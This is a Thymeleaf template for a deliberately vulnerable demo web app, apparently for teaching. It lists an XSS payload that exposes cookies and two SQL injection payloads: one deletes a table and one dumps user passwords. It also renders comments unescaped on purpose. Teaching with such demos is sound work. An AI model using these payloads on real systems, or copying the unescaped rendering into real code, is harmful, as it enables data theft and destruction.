<!DOCTYPE HTML>
<html xmlns:th="http://www.thymeleaf.org">

<head>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
	<meta http-equiv="Pragma" content="no-cache">
	<meta http-equiv="Expires" content="0">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title>Vulnerable App demo</title>

	<link rel="stylesheet" th:attr="href=${theme == 'dark' ? '/styles-dark.css' : '/styles.css'}">
</head>

<body>
	<script>
		function setTheme(themeName) {
			window.location.href = '/portfolio?theme=' + themeName;
		}
	</script>

	<button onclick="setTheme('light');">Light theme</button>
	<button onclick="setTheme('dark');">Dark theme</button>

	<h1>Vulnerable App</h1>
	<p>Here is an example of a vulnerable web app.</p>
	<ul>
		<li>
			<em>For XSS, write this to the <b>MESSAGE</b> field:</em>
			<pre>&#x3C;script&#x3E;alert("Oh No! " + document.cookie)&#x3C;/script&#x3E;</pre>
		</li>
		<li>
			<em>For SQL Injection, write this to the <b>MESSAGE</b> field:</em>
			<pre>&#x27;);DELETE FROM comment;--</pre>
		</li>
		<li>
			<em>For another example of SQL Injection, write this to the <b>NAME</b> field:</em>
			<pre>oh no&#x27;,(SELECT group_concat(concat(id, &#x27;,&#x27;, name, &#x27;,&#x27;, password) separator &#x27;;&#x27;) FROM user));--</pre>
		</li>
	</ul>

	<h2>Comments:</h2>
	<div th:each="comment: ${comments}" class="comment-list">
		<div class="comment-list-item">
			<!-- TODO remove xss vulnerability -->
			<h3 class="comment-title">[(${comment.name})] says...</h3>
			<!-- TODO remove xss vulnerability -->
			<div class="comment-message">[(${comment.message})]</div>
		</div>
	</div>

	<h2>Your comment:</h2>
	<form action="/portfolio" method="post">

		<label for="name">Name:</label><br>
		<input type="text" id="name" name="name" value="John"><br>

		<label for="message">Message:</label><br>
		<textarea id="message" name="message" rows="3" cols="50"></textarea><br>

		<input type="submit" value="Submit">
	</form>
</body>

</html>